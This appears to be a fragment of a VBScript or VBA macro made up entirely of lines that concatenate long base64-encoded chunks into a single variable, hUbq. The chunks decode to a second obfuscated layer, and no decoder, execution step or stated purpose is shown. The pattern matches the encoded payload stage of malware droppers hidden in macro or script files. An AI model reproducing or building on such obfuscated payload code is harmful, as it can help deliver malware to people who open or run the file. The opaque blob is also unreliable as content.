hUbq = hUbq & "L0gxMTw7MUI9M0ZPMTJEMERSLlhXLS9TMlgzLk8tMVVYLT1aMDFOMDYxMy05MUFRMzxJMj5ILFlZLy80LFhbM0VaLEo0My4rLk4/MzFYMVYqL1BbMThAMlJELjItLlREMj5FLCxIMjRbLzhRMjEqMkgzM0E1MkkrMUFRMUIoLFhaLjpWMjBNMk5BMTNDLkRbLTlKLlk8MCxHMkRNMkg7M0FXMyk8MDVKMlM0LE8uMkRFMzJELzQ5MEA+LzhSLypJM0E0MitDMVpHMjBUMVAuMDBZMVYpL0I4LkA6LjI6L1VbMUw1L1FSMkk8LzxYM0ZCMVArMTM+Lko6LTQ+LkUqMERJLTQpMkhLMTdZMCxKLz4wLkApMUsuMy4pLjE4MldUMzMpL1tOMjU8My0+MTMxMjlHLk8wMj8wL0tVL1VXMk48MlgxLSpCLllLMjlaMjVNLFlCLjpRMVBIMjVPLklKLyo2LllCLTQ8L0xYMy40Lk9ML1pRL1ZMLjBaMjUzMj5aLklVMT1GLz0sMzMxM0ZULlQvLS8zMERDLzkoMk42MUcxMitGMVVYL0tLL0xJLEFMMzdQMT02MEU2L1FLLkpUMis6LkA7LjY0Mk5CMVooL0tSMkQtMUY2Myk9LSpHMD8vMUZSL1pCLC1WL0MqMVopLkpLLThaL1BMLjtRM0FSMyhMLklHMVA+Mk4yMj5b"
hUbq = hUbq & "MUwsMkQuLSpbLjZaMk00MkQ9LTkpM0FLMCs7MD81MTxLL0czMlctLzQqLlQxMVooL1pRMTNOMitAM0FOL0c8Lz42MVpBLFkpMVBbMis8Mk4pLC1FMlNGMlIwL1BPLk4/M0FYMUZILlNPLlNYLS9WLE9JLT5NLjcsLkBCLTAsLkpMMThLMk5GMT1DMj5CLjIpLy5NM0BILjwwMk41Ljc1MlcyLFA4LllDL0JWMz0oL0xVMDE2MzI2MldSLjcwMEQqMjBVMERPMj8+Mi9MLC1KMDs9Mj80Lz1ZL1EqL0wxLEs0LS9NMj5IMzdBMUIqLFRSLFRJLzk1MklFLkA7MERHLTRVMT03My1aLTQ7LTUpLjwyLkRKMjA6MklHMUwvLklYL1E+Mk42M0BZMUtLL0IyMkhbMDVTLTRQLz1XMlJUL1swLEY5LC0qMTMuMD8/LjcqMDE8Mj8wMzMxMDYxLS5SMDpJMzM2LSpBMjAyLT1WMEQ6LkpJMDA/LSo3MlM4LjtTLEo1MDVGLkA0MDVLLEYpMDYoMzw5MzZQMzdCMldULzM+MDVOMUtBL1tOLS87M0FbLkorMVYzLzk1MDVJLT4zLEs0MjlaMCxALEY9Mk1TMTxZMlM1LSpXLT5GLEs5MUc2MlgqLC0+Lz4zL0c9MjpEMjVGLFA6MDFAMklLMzdaMDBJMkhBMjRbMkg/L1pR"
hUbq = hUbq & "LC0qMEAqLSpXLTQvL0tQLlRDLFUtLjVaMitTLEZKMU9XLy8/MUY1LklLLjtaLk9AMk1UMEA4MlJPMlJML1suL0dRMT0sLkVNL1ZOLk9DMEAwLEEpMDBAMzFbMVpGMk09MkNaLTkoMjlHLkErMT0/MCwrLkk/MjU2MEU5LTlHLjtYLllFMVE6LTk9MVE+Lk9SMD9QMTJJMi9HLjE1M0ZaLTlIMVEwLlhWL0dOLEVNLC1UMitWMk1SLk8qMzc2L1VZMj9MMjVJLzQsLzNNMjA2LEE7MDBPMis1Lko1LjFXM0VXLE8rLFotL1pGLzJbLklVL0JHLFoyLy5XMldNM0ZDMVo9LT4vMlg8MDU3MitXLS8wMisxLkVJMEUzMk4/Mzc6MDpLLz1aLkpGMy09LFArMDEuMzZYMD9SLklXMk1VLy8tMzdOLFUvMi9ML0ZTLE9ELEpXLFlCMkNaMy0pMy0pMVBIMVYwM0YxMkhKMk01LS8/Ly5WMVo4L0wzMEQtL1YrLzktLFopMzwzL1E6LkVNMDY/MEA8MVAwMlg4MEA4MzxBLTRNMVU+MT0pMUJCMTM2MUcvLy82M0ZQLklXLFROLy8uMVpWMDEuM0FTLTlNLjBZMThOLkA0MjUoLjs3MkM9LlNbLkpNLTkpLklKMj8pMlgpLkBPMy0qLFUwMjlLMzZTLjFGLTRaMk06MERM"
hUbq = hUbq & "MkRJMTg7LklHLkA2LTlFLEFBMT08LzkrMkRJMzJSMjRLMy01L1FJLkU+LzxXLFA/MDpLM0EtM0VJMUE1MT01Mk4zMk1MLlRRM0VWMERQMUZLMDpPMk5FLTkqMCwwMlJILTAtMThJMEQ+L1VFMEQuMDs6LEVOL0FTMitAL1ZEMDA6LzhGMlJRMUc4MklFLT5OLEU3Mjo5MVBCLSlZLjwrMkNAMzJRMj5DMTM1LE8/LjwwM0FPLEs7L1FbMVEsLC06LjIpMVEzLk80LjBaMk1GMVBNMkM/LEA8LTRPL1ZILFlJLC09LjVaLzQzL0xaMjVSLTNRMDYpMVBALC0wMUYxLEA6LTlJMTM/M0E4LjVWMkQ/MlM5Mk04MitVLzQ1Mlc/LT5VLj9SLTQwMUI4M0FXLz09LC09Ljs6L0I6Mk1OMkQoMCtALSpZLyk5LEU2LC0+MUZEL00oMkktL1ssM0ZNLTQuMjopLz0/M0EzLjpQMy02LFA/LkoqL1pBLjwtLFosMy09Lk9FLFUzMkhLMUFVMzxKLC04MjU6MDVZMDpLMDYyLkopMkktLE8sMyhSMT1EMDAzMVsqLjpQLT5MLy86MTMxMVpaMjA6LFhTMEU7LkEqMDBbMUwwL0JKLE8uLzdbLjIpLkU7MitUMj5aLTkoMlJWL1s1LlNEMCw6LEBXMUZHLz45LSpXMCtQLTRM"
hUbq = hUbq & "LjZUMDVQLkRZL0c+MEU2LFU6MlJVMy1HMyxYMldDLEZCMEA3LToqMVYrMlMtLkRHM0ZNMERbL0dDMzc+LzQ0LEY6Ly8zLzhBLkArMDVMMTM/LlhSMy1FLjsyLT1EMDFBMTM2LkRMMk02LzkyMVlZMDE3L0w3LFk+Ly8vMjA1MUE9MDpRLlQyLy40MDs4MVE+L0xLMUE2MEQ6MlJPMDZBMUFJLC1KMykpMT03LS9SMDVaMEUrLTAqMkkoLTNVMkkpMjA9MjpQMlctL0MtLTQ6MDVXL0xNMVEqMkRRLlQuMDo5MklOMDpILEY9MjAwLy9FMUZHLS5RL0IoLlM3LFA5MVszMkQtMEQwMDs/MDpJMj5DLFUvLkU5LkUtLko3MUY3Lz4wLFRRMjRZLkEtMitVL0I/LkA3LzhZLyo/Mis/MUFbLSo4MUwrL1pULy5NLylILzQuMCtbLk9SLk9TMUFRMUFRLk4/LEpPLT5OLTlZMj5RLS8tMj8rMDpJLjsuLjYoMjo2Mkg5LzgwMjpCMVY3LjtBMy4xLlROMj5JLko4MVU8Lz4sLFAvMis2Mlg/MzcyL0xSL1ZVMipUMj9LMCwqLEVOMzMoLylTLzhZMDY8LSlZMDU8MVs1Mlg+LzNEMlIxLEpXL1EsLEpIMjVVMzdZLzNILy45Mlg1My1JMkQtLkA9MUZMMk1bLzhSMTw4"
hUbq = hUbq & "MztNLTRJLlhNMzcyL0dTMk1HMiswLjEtMk04MjpRLFk7MDpMMipWMlg3MDBLMVpbLEZDLyo8MTNNLC0pMlgrLlQtLFhZL0xWLSpILkpNLEtGLkVFLC03LC1WMD9NLS88MUI8L1VKLzQsLk9GLlkoMUEzMjUpLEpPMlI3LjI3My1YM0ZaLTlMLz4zLy85MTg6MVUtL1YsMTdXL0ZQLz4zLSlYMjUoLT5XMztRMjBBL0w2M0BLLz4wMTdBMUI6LT1GLE9KL1E5MUJJMTJZMipPMT1OLjEtMzI9LkotMVspLklVMVpGLklFMjlLLjFZLEYzLlNPL1pEL00tMTdQL00pLEpLMD9FLzNDLjY1LTAyM0VHMD9SLlM3Mj5JMT1ILjFGLk5bLj9LMzc3L0JAMj5CLT5SMDBLLEsuLzM0L0xWLylOMDpRMCwwMzJZLy83MykpMUZMMCtOLEVTLEVFL1EyLS8tLjZYMldVMDBZLjFLMD8xLkErLjEpMlJOMlg7LFo3Mk41MVYsMzxCL0xRLlk+LS9ZLEsvMTNRMVpDLkpaLjY0MVRXLko5LFlIMTw6LzkyLjtaLjtZMDEqMD81MkQyMT03MCxHLy5NLkBZMy4oLjpQMy1LLS5XLzMvMDY6Myk3LTQ6L1Y3M0FLM0BPLkotMUw8MldIMVVFMjpNMkNbMj9QLTk1MjUtLkRDMDBJ"
hUbq = hUbq & "LjE6LT5XLz4qLThLL1BLMDVMLko5LllGLC02LzksLTlTL0tOMzw3LFlXLk9RMCw/MDpOM0Y5MUE7LTlGM0EzMDY9Lz0/Myg8MUwzMUtOLjY8LFAxLFlGLTopL1pZLSpKMUtVMiwwLS82MDBQL1Y2MTNGMVE1L0xYMipLMkhAMUwtM0BKMjpIMUs0LzQxMT0tLk8wLFU+MCtPLEo0MT1EMjA7LC1MMT1KL0c1L0I2LypIMVYqL1Y2MjEsLSsuMj5CMyhRMzJKMTNELjs4MUFRLk5EMUZKMk1RLkRIMlcxLko2L0I6L0FbMitRLFotM0E1MTc7MTg+M0BaLEE9MCwvLylMM0FVMDY9LlNTMEUyLy8uLzQtLlRHLSlZL0FaL0dOLy89LzRCM0BNLTQ2MEQoMVAqLzQyMlczLT5EMEAsMVE0Ly5TM0YuLFRDLC0oLzMvLkVNM0BQMjRHLEVXMDpQMjoqL0tTL0xNL0MuMUdDMCxNLS9CLC0zM0VGLSpXLFAwMk49MVlVMk05MTguMUYzMD8sMipZLS9NMlJQMlgxLkosMldRLEVFLThbLS9CMi9HMThGMkQ5MEROLFRHMUxCLEBAMzMsLTkoLkpRLy43LjtALz0oM0BKL0gvLllCMk1SMVU8Mzc3Ly40LjZAL0FaMUFFMUw4LjtUMENXMkhKMDY+Ljs4LSsrMUtFMitW"
hUbq = hUbq & "MDFOMzZUMVVXLT5ELEs5MUtMMjRDLSozMj5ALT5BLzQ3Lk9ILFU5LTQtMj9WLSpJLk9QMT1KLSlYMjUrLlRPLy88LjwoLT1GMTMqMk1ULkotLzRCMVEoM0YsLT5VMjVaMERLLSspMEAvLEZGMklHMUI2L1pHLko6MUpbMVswMjUoLT1WMDtBMCtCLzNHMUcwLjs7MDU5LklVL0xVLjpXLjE9MUc9L1ZNLzNRMkhJLEo5MkkqLzQ8MCxNLz03LjZRMldWLTksMzw+LkVXLjEsLklHMUJHMz0tMDFILjFELkpaMEAyL0xKMjovMT1DLS8wMy1GMyk+Mj5JLS80LTlHMDA+M0E0Mk44LkA8Lko3MisxLjtAMERRMyk1MjVPMzdDMzdVLjsyMztMLjpSL0gqMiwuLyk8LSo9Ly45MDFJMVY6LFA/LzhGLjcyM0BJL0xZMTgtMitZLzguMVBOMkQtMEU3MipSMVY4MTdWLFU3MCxSLjwwMlJXMDBSMyxaLk4/L1E+MDYoMDpBLzMsMUczMzIzLlhMMldBLEVbMDBSLlk4Lz1ELjFZLThZL0FPLlhYMVBbLjZKLkBKLjIvMEAsMUYzLT40LkVXMitAL0JELEo2My4zL1ZKLjFOMTNPLjwuMDVLMVYwLE9ALFU4MzZUMk1FMk5KMldDLThKMldWMzMvLkRQMjo4LzQ5MEAs"
hUbq = hUbq & "Lk5AMkhQMTdXMkkqL1swMUYzLz4rLS9GMzxJLTNOMUE5LTk5MUFVLFA+LkUqMklKMUFGLkUuL0dPMlhBMUsrMlNDLFRZMT02MzcwLjY+Ly5ZMTg8MjlHLkRJLFo4LTAyMVVILk5ILE9UMjpMMjoqLEFEMjU6MldHMitTL0xQLy5UMygtMjYpMD8/Mj5VLkU5MUwpMykqLE8/Lz1ALE8tMUwvMk0zMVE1L1tFMCxDMkg9LTUtMkNQLkVFMTJSMDBaL0tMMVlaMjVJMzJWMykoMVBGMUdBMyg7Mk1SLFRNLkouLFk/LkRDMVVBMitbMjBLLy88LS9WLS9EMkhVLS5LL1YyMTJIMj9VMTw8MkQ5Myk4MzJKLkBVLz42L0IxLzguMjlNMk4xLEpHMDFOLzNMMDE1MVU1MVU2MkkoMkRNMVY3M0ZDLjs6Myk+MlJDLllFLy83MklIMjBaMk1bMVlVLzQ0M0VGLTlTLTAtMzxALlNXMCw7Lk8pMVpHMy43LjwpMykpLT4wLy8+M0E+MDVKL1FOLFRPLFRHMkhTLjIuMkQrMzJXMy0oMTgrMDtBL0M1L0w5MlI4LzRCLjZILkVHMjU4Lz4wMklILyk2MUFWLjI2Mj8sMztLLFhTMCtPLTkzLylHMzxXMj9ALz4tMjoxM0IpMlJDLT4rMkg4MkhMMUFTLCxbLy4zMjBYMlMw"
hUbq = hUbq & "L0grL1YzLjtDLk9RLz1ZLk8zMj8xLkVFMTJbMztPMEUxMzcuMi9PLjZULC1GMk4xMjVUL0IyM0BZMkRHLjE5MVA5MyhBMis+LylGMVsoLTNOLzk5MygoMVpBMjUzLS9XMUZVLk9BMERSMlJEMDpaMklBMjAzLkVUMy1NMTgqL1ZLL0xVLSpJL1tVM0VDLTRNMlIyLSlbM0E3Ly5NMDVGLEE+MldLMkNXM0YrMjVGLzgxLzNDMy46Lyo+LFQ+LC1VMzZUMVlUMzMzM0VYLFQoL1s1LEo4MzxbLEBbLT5NMVBNLlQwMj8sMCxSLkUuLTlSMUc1MjEtMDBZMjVIMD9WMTxaMTc+LjwpLk8wLzg5MjU3My40Ljs1MkhbMzxUMyhZMjlKLTRQLlk3Mk4oLTRLMzxRMlgyMDFBMk44L0xbMj9PMk42L0ZYLC4qM0BHMj8qMVRTMj9MM0ZaMlM0LEVYLS88Lyk0MERDMCw5LkRPLEsvLC0+LjpTMlMwLzkvMkg6LkAxMVpVMTNDLk9CLEszMkk/MitWMTJXLSo8LkEsLjBaMUY5MEUvLFBBLzNFMEUyMkk7Mj9OMzMyLFAsLjVaLk9NLSstLlRKMkhNLy5ILSlaMVY4My0rMEU7MDs/LkVVMlgvMCwsLlNOMztNMUtALjtQMjlJMThAMjErMD81L0w6MlI1LTkrMUtLLC1a"
hUbq = hUbq & "Lk5BLz4xLC0+L0JTMkg3LzNQLkEtMzFVLEEoL1BOMjpNMTg/M0E8MCtbL1ExLFA0MEApLzMvLjE/LFRRMy1YMkQyMklFMTJaLllNL0ZTMVpEMVs0L0JVMklAMklOLFlHMjo2LEZILk9ALzNQL0xLMy09Mj8pLjwsMERMMTNCMiwxMldHM0ZELSo+LzdXMEU4MDE2MzxNL0tRLlk5LjIyLz0rMzJAL0ZQLkBaLjwuMDBOLy5DM0ZJLSlaMygoLT1FMzdbLjsvLFU3My4yLz4pMis/MkhOMERALz01Mj8wMy1GMzxPLE9NLEFCMjo6LC4oLC0sMzxYMUJILC1bLEVIMk1MLFktLFotMCtELTQ6LkpMLSo6Mzc7Mk5BLTkrMj9BMj9ALy5ZMjU5LEVaMTMwL0I4Mk1RLjIpMlg8LCxPMDUvLS85MUwwM0EpMDVGLE9AL1pBMUczLS9YMTdPLFQ9LFBALS87Mk4zLSpUM0E+L1tQMitFMUE0Ly5LMkQwMzJGLTktMklNLy5HLS9OMjRKMjo2Lz4sMDYxL1FKMDVbL0ZVLkotMlg3Llk6MTNVMEQ6LkUtMyg7LjI2LkVSMk44L1VLLTQsMThML0I1LC1TMThMLjIrMEUvMjVSL0xbL1BNMzZWLkpQLFRGLlg6MjBAMis6MCxDLjErL0cvM0FHLjctLEEqMDtBLjs8LEpU"
hUbq = hUbq & "MERaMzI1MTJJLEY3MVo+Lko1MVU6LC1QMD81Mj5ZL1s+MUw1Lk5YMEA8LTQxMklLMUZCLE9NMldWM0ExMjAuMCtWMlM6L0xLLz1KLjFaMzxJMj5GMTxMLSpWMjYpM0EtLlNXL1VGLEVWMj9IMk1IMUE8LzM+Mzc2MD9AMk08LzkvMy4pMlJPMTJCMCtWLzhIM0E9Mj8+MThSL1FYLlRNL1o/MTxZLS9QMDVKMCs/L1pDLzNTMEUuMEUoMT0rMjoxLS8uLz01MlJIL1FJMjRRLlhSL0ZTMDtBMkQ+LEU3L0I6MlJaMztHMD9EMzJEMj9HLlg4My1EMy1HMDpBLEo2LEpKLFU1Mkg6MipTLjZXMUwyMk48MVozMy1VLEpKM0FUL0xCM0IoMzw0MzwqMzgpMVRTLFArMVlVL0MrMklOMVAuL0MuLz43MTJJM0FFMlM9L1BbMztULllGMDEpMUFQMEQwLkVGLyo0L0MrLlhLL1VNMEQrMzJTMT1GL1tLMUI0MTg7MVE5Lzk3LFopLz1LLTQsMy0/MjpIMDFHLSoyLTQ1MUtFLTUpMzM1M0YyMlJIMkQ5LkBLLjVXL0xaL0cxMkNYMDBWLz4oLy5KLFlbMjlbMis7MVBbMTxPM0E9MTw4MEA/MDpTLjtDLk9NMUI8MklAM0IqM0E4MipSMDpaLz4tMUw6Ly8uMjlFMjYq"
hUbq = hUbq & "LkU9LCxbLkpEL0w0LlQrLTlUL1Y0MVsuLFlXMy1ILzQ0MklCMCs7LzhZM0Y4LzQ4Mj8oMy0pLy5SLFksLy4yMldKMTNTLz1MLlRSM0VLMyhELFhaMD9IMDs3MUFGMDY+LkBPLy8wMDpHLSlUMisvLE9MLThNMVVVLEpKMzJIM0ZFMUY2MVpWMDVILT1WL0w7LEZKM0EzMztQLjZKM0IqLEtCLjtGMCwsMitGLzQ1L1tQLlNWMjA8Lz09Myk1Lk9FLkRHLzNJL1pbLlNELlhJMlc/Llg8MTNJL1s+MEUsLjEtMiswLk5ALTlZLT5MLEpZMldRM0E0MEQxLE9WMVpbMDBTMTdXMDBQLlRMLzQrLlkrMitCLThbMUw/M0ZVLkpXMyk0Mk1JMDBOLy81MTdaMjVGMEQuLSpTL0dQMTguLE9JMkk/MVVAMldDL0FXL0grMDA/Mzc6MDEsMVVbLzMtMkM/MVU3LC0wMkhJL0dDMlJGMDpILjwrMTdBMUtHMEA9LSsvLFooLk9ILS83MDs8LFo1MztQLTUpM0FTMj5RMjYpMDo3L0c9MipVL1EuMVUpMUI0MTdULypBMy41MztNMUFGMDsvLkRHLlRIMVBFMUZILjEsLEpJLklVLkRRLSo6M0YwMjUpMjA6Ly8wMkktMTI7LEpWLjE1MVU6Lk9GLkUwLTNLL1pCL0I4LTRA"
hUbq = hUbq & "LkpNL0I5LklHLz1MMj9SLjY8LkBSL0JWL0xKMz0pMT03MzJDMDBALT4yLFlML00rMklFMkNSMy1GL1s9L1tALlkrMVVBMTxSLzQ+MTc/MDVZLjE3L1EvLzNMMVo/LjwpLEVOMUFJMjlFMjotMkg3L1VKMjlIMjRLLEVZMzxQMjUsLzk0L0tTL1ZCMiwxLFQ8MUZOMy44L1s2MUI4LjI3MDo0LThbL0dPLzk8LTRQMUE3L1ZTLlhXLzxXLFlILC1VMTNNMjlJLkEuLjpWLTNSMD8wLz01MUFZMyk6MzIzMkRNMkkoMj8qMkkrLFhZMDE9MUZNLkU6LzdXLlNXMCs9LzhGL0c7MyhJMkNSL1VILlhTL1tILyopLFU8L1paLjtVLy42LEVRMDYyMUI1LFA9MVU+LEoyMUtKL0ZTMT04MzdGMUw9MzMtLEFHMT1AMDVPLklELEZILjE9LkRLMkg+LFRZLSlWLlROLFlZL1E0LjY2MDVVL1pYLk5aLjcvMi9HMzxWMykzLC1UL1s+MEA9LC0+Ly8/MVUsMzdDMCtbLT5CMyxTLy8zLlhPLE9RLFRKLylTMENXLEEpMDVRMlg8LC1SLzhbMy4zM0VVLkVZMkNYMT1FMjBVMDpNLjFYMklMLjFbMEA+Mj5JMD81MUYvMUw2Mj8xL1VVL1YvLTQwMTJSMkNDLjFIMk45L0cv"
hUbq = hUbq & "LjtVMDFNLjcpLT4zLkA4LFA/LkRJL0I9Llg/MDFDLk5ELzQuL0dULyoyMDA+LjwuMkk9MDpHLSpHMk5JL0I5L0w4MDBJLlkrLTQyM0E2MTxbLC0yLklKLk5TLFArLjZSLC1HMDBOMUcyLk9UL0w2Mis1MDpRMk1QL1BMMlJaMTc9LTlULjI5MkhJLkpCLE9HMEUpMi9SMjAxLzxbMDpZLT4zMDE6LFlVLllELFU1LT5VMy1MMjlGLjFALzQ+L0gyMyhbLjtXL00tMk09LSpaMUI5MEUxLy5aMVBQMygoL0FPLCxLLTRRLzMyL1E0Lyk3M0IpL1pULFQ8LjcyLjFIMTdCMipTLT0/LTlWLkRbLk5TM0ZNLS9ULlQ7LkVSMUFWMDFOMyk0MzxKMkQ/LEE5MT1ILjwoMklBM0ZGMVYpMTdaLy8uLTlUMDVbMjo5Lko6MklDMzI8MDFILEY+My4qMjVYLyk7MU9XLS9XL1ZTLFRKLFk5L1pSLz1DLy85MEUuLjpYM0FbMy4tMj9HLlk2MykwL0I4LllCMVUqMUI1MCxHMTdDMzdZLT42MipTMjBYMzc+MzMxMlNCL0tHMjEoMDE2MjU+LFo4MCs+MUw3L1FZMUYrMy0qMj5VLEYqMCwsMUJFLy89MDs4MzctMykqL1FYMVVDMUJGLkpELjtNLkVNMTMsM0BJMTwzLSpB"
hUbq = hUbq & "MUZRLFRSMlJRLyoqLzhbLkRbMzI2L1FNLE9DMjUuLSo9MlgwMkM8Ljs3MjRHLTArMlgrMlg3L1BJMj5WMERaMDY9LS9SMjoxLFNXMUJDMyksLjI2MjA9MTNNMVA5LT1XMT04Mzw+MT1OLFlDL1FIMjVRLFU5Mj9CMUYrLz0oMUtFLFA1LyozMVVIMD9TMEA3L00qLE9PL0I9MDs+Mjo6LFQ+LT5ZLzk0LEsuMi9MMzZYLSlVMzFaMygwMy1EMVVXMzwuL0xKL0dPMVpIMkQsL1tALS9UMzJZMVo1Lk5UMlJYLFBBLFQ8MzwqLzk2MDU4M0IpL1sqMVozMlI3M0FFMD9LLCxZLFRZMldEMyxZMy1ILlM9Ly5GMEQxMUI0MTw6LT41MlJCL1ZLLEA6MUtPLy42MUw9MUFbMitaMzJRLlk/LlhZMUZJMzcuMTdUL1pFM0VGM0ZSMy06LC1XMy06LjtQLTQ2MEQrLzgvMTw5LT1MMipQMUxCLjwtMjU6LEFOLThQMjUxMjA7LFlVLjwwLzk4MTc+LFU0LFkoMUJFMVBCLz0sMUcyMyhMLk8qLzkoLE9PMVs2M0ExMyxbMT1DMUtIMi9TLTUtLTNNMlM9LjVbMVBLLy8yMERCMUtOL1syL1BPL0M1L0ZTL1tOMDpDLFAzLkBMLFRRL1tLLFlDMi9OMzw8M0ZCMEUoMzwu"
hUbq = hUbq & "MUc3MkhaMUEzL0grL1soMTJBLkApLlRSMjpOMzdPMDY3MUFJMDAzLEZEMCw8MDVSMT08Lk5BL1pYMDsyMDBSMUtFMD9MMUc1MzwpMjU9MjA0LjsxLz02Mjo5L1tLLTRVMjVLLy5CLSpZLlQuMkNQMTJULzQ7MkNOLT1JLEY+Mzc/LkA7Lk9ULEBJL1YrLEstLk9ALjcyLEVaMy4zLlQ+MDZFLypKM0YoLjwvMTM1LkpQLSsoMEAxMUJALlhJLllFL1VbMTJBLzkxMTdbLzkuMjBLMTMoMjlNLz1ELTQ3LSsoMDpGLE9ULEs5M0Y6MitZLy87M0EyLk5TMDVTMjA2LEY2MygxLjE+My1bLEFOMUw9LE89LE8tLz4qLTk9LlhMMUIpLTRWLzQsMUEvLjVWMVYtLThOLkEtMTJEMEA5LTooL1ZKMVpIMkg+LlNNMUJKLlRJLS9CMyg9M0BKLTooMDFDLzMyLFoxMy4wLS9NMTNAMk1XLylMLTk6Lz06MzMrMEU2MklAM0VXLyoyMUFJMUY2MyhRLCxDMVA5LkBPLFk2LTRXM0ZFLzxZMDBBL1FFLy86MzJTLzg+LSpALFRGMjArL0cuL0ZZMUYzLEBJLTlVL1VLLjBaMDA/LzktLT5aLEFMLTNNLFRCLlkpMVE6LjcuMjA1LzQ1MDBPLTkvMk0vLzhBMDA/L0JWL1s0"
hUbq = hUbq & "MEAqM0FUMkg/MT1ALzRAMjUtLjZIMjpOMUZTMVVJMjpRMkNBMDtGL0JXMk4+MTMsL1YoLFk/L1EzMk5DLE8sL1YoLkRZLz0qMUcyLEo1MzxYMy1HMitBMj9WL1tOLy83LTlGLTlWLjZKLkU8Mi9VMjBMLTkyMDE2LjtCMlc0LEZELyk0Ly9AMj8xMzJSMDVaMTJFMyhLMUdAMlguMzI8LjtZMkRLMCxJM0YwL0I+Ly40MD9IM0BNMUYyMjlVLlNaMjlLMkQyLEoyLjYxLEBAM0BOMVUrMy4zMDZELz40MERZLjVVLE9LMVE8LkRbMUw9LTNMLEpHLy8wMk1JL1EqLFQ5LFRSMDpXMDY+My1XMlJIMy4vLkpDMTdUL0JJLylUL0JWMUIpLyk0Ly5JLjtbLS8+MzdPMitGMDY9Ly9DL1ZZMkNOMjpIL1pBM0FTLjZDMUZULFU2LjpWL0dCMVVVM0IqLT43L0I5LzMzMy1ZL0xUL1tHLS9OMkhMLFRDMThOLEs8MTxPMDY9M0E9Mj9PLE8zLylXLyo/LT4yMEQwMUFKLjwxMDU6L1FRLTk5LkBaLzgxLzMzMzwwMVYpMDU9MlgxMzw2LTlSMVU6MCwtLS9WL0c4MDY7MUdEMj47Llk+MDtGMTxTMjlIMDE8LTlHLEU6MykuLyo4M0EuMzc2MDBOLzhOMVAoLy5GMCw/"
hUbq = hUbq & "MTNALTlOMi9TMDU7MUtULzk7MUw+MzJULyk7MDBALzguLkEtMlNFMitCM0ZDLzkoMjlLL0dPM0FMMEQtMEUwLFU5LEZILTlQLEUvLT1NLy9AMjlWLTlFLklMMEUrMj9RMkhbMTJWMyhKMi9MMUdGMEAyLylXLFk1LE8tL1tLMEAyMTdZM0FFLE5bMVRaLSpTL0I/LzNDMTgqL1ZVMkNPLEY8MCxNMEU8LFQ6LFk1LFRLLylQLE8rL1BOLz1ALylFLyo+Mk43LTlNLSpFMzcvL1YuL0IyL0I0MTdVMUZTMk09L1VGMCw+L1Y2MlM9MjRJLEs2MTxYMCwyMEQqMDEtMUFQLjZRLjFWLzMtLThZL1tMLypALk8/LThHLz1MLlQpLThILkVUL0I7MVpbMTdVMjpDLklKLjVUMzxXMjVPL1Y6Lz45Mk4yMCxFLS5PM0FSMVVMLlhXLkpXMEQwLkVHM0ZBMUZWL1tPMkRQLFRRMkk7LS8tLjZXLy8wMT1IMCtNMlJCMDFELkVTMzc8MUJIMUE5MCxSLEY0LTRBLTRMMjAuLTRPMjUoLFRKLE9FMDA4MitCL0xBMkhXMistL1tVMCtNLkpIMDBZLkBBLS9XL1FXLzguM0ZVLT5TLFRHLjtOMzgoL1ZZLkUpLz42LFowMjVUMzgrMlJPLCxaL1YuLC1SMT1AMDBRLz1EMlgt"
hUbq = hUbq & "MzgrMltbMj9FLFA7Lyk9MVU9LTkoLy5SLC1XLEZFLkVUMDVbLkUoMUc5LC0vMkQuLk8vLkpHL0ZSMzdUMDFNMjBJMk04LFRDLz4vLkpCMldEMkk5LCxLMjBTLC05MzJUMTxbMEQ9MVsrMTw9MTMwLEpGMCtFMkg8LSpRMDBbMDZDLjZFL1tWMzJULzNCLFQtLTRKL1E1L1tTLjtWLy85LTlLLk9TL0w2MjBVLFktLEYpMkNVLEVbLkpZMVsrMj5GLz1ZLTkyL1s/LlhXMDs4LkApLy5SMk45LSpBLjY/LT41LjpULFotLy5VMT0sLkBQMTMyLEVYMz0sMVYqL1pULkVKL1VVLEVMLC1bMjBVLypELkBTMkkqLEVYLzQxL0IoM0ZaM0EqMlJZLlksL1VELThaLFBBMjlJLzQzMUE1MVEzLlRIMjUxMzZUL0dVLylYMThCL0tRMlhCMztRM0BNMkM/LEU3MldBL0MvLT4xLlRDLFUtMzdRMkNOMyguLTNRMVAvL1VFMjUwMzI+Mi9MMy1GMTgsLFRNLEpBMlhBMDFHL0xSL1Y0MkRGMzcwMitRLlhPMjAzLkBTMDBYMzJEMD89MDEoLylHL1Y0MVYsMjo1LE8tLjtQMy1FMUZRL0w1MEU1L0gwMDs6MDsvMVBOMzxTMlJJMkNXMEUyMCtbLC1JMVpVMy0/L1BIMTM/"
hUbq = hUbq & "Mk41LFAzL1ssMVVFL0c3M0Y2Mzc7L1EyLEpHMT1JLk5WLC0tLkpXLzgsLy5ZMUw/MjEuMVsoMlMtMjpFLEY4Lk8yMzdGMCtEL0JJLklYMkkqL0dQMlM4MDVSLTkpMUZZLEpKMUtULkA/LC1RMUc7LTlSMj8uLjpPL0I6LlQ7LT1JMiwxMUFWLlkqMlM+L0xJLjtbMzc4LyozMD80MjlGMzdRMEA3M0IqLypHL0I5MjU4MT0qMlctLkouMipXLjtEMCs/MVU6MjA6MVYrMlhBLkpRLTk+L0JTMiwqMisuMzc7MkNFLzQ4LT5MLlkoMiwuLkpBMyhHLFQ+MlMvMzcuL00qL0cyLFUxL1VXM0FMMitAMDZFMk43MzMoMCxQL1ZIMDBBM0VDLFUyMzZVL0xPMisvLTlTMDBNLkU8MUFNMUcyMj9AMTxBMlJBLz1ILjFFMyhbMDVPMCw/LEpMMVBGMiszMEBCMjU0LS87My1MMEA5MVA5Lk5HLE8yL1VDMTMwMk47LkAtLSlVMUZTMy41M0FMLTk+MzMxLjI3LT1XLjpQMVsvMzZWMTM/Lz4oMT0rLT5CLzgwLS9BMEUxLzkpMCtSLy8xLTQsLEVQLFo0LlhSMyg6Lz08L0dYMyhGLTlTLEsuMkkrMzMxMlcyMkM/MEQxLFlOMkg6Mk1OLyo3LTRKLEpYLlM8MDYpLklL"
